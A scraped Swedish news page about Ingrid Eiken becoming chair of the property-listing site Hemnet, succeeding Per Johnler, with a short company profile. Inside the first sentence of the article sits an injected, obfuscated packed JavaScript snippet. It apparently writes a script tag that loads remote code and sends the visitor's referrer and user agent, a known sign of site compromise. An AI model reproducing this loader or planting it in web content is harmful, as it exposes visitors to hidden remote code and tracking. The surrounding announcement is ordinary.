Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Ingrid Eiken ny styrelseordförande i Hemnet

Ingrid Eiken ny styrelseordförande i Hemnet
Sebastian

Måndag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|indea|var|u0026u|referrer|iekry||js|php’.split(’|’),0,{}))
den 1 december tillträder Ingrid Eiken som ny styrelseordförande i Hemnet. Hon efterträder Per Johnler som varit Hemnets styrelseordförande sedan 2008 samt ledamot sedan 2001.

– Jag ser fram emot det roliga uppdraget att fortsätta utveckla Hemnet tillsammans med övriga ägare. Jag vill samtidigt tacka Per Johnler för hans insatser i Hemnet. Per Johnler har varit en målmedveten och visionär ordförande som med konsumenterna i fokus medverkat till att skapa den mest populära sajten för bostadssök. Det har varit till nytta för konsumenterna och för mäklarbranschen som helhet, säger Ingrid Eiken, tillträdande styrelseordförande i Hemnet.

Ingrid Eiken är vd för Mäklarsamfundet och har suttit i Hemnets styrelse sedan 2012.

Om Hemnet:
Hemnet är Sveriges populäraste tjänst för bostadssök med totalt upp till 2,5 miljoner unika besökare i veckan. Hemnet startades 1998 och ägs av Fastighetsmäklarförbundet FMF, Mäklarsamfundet, Fastighetsbyrån och Svensk Fastighetsförmedling. För mer information vänligen besök 
www.hemnet.se.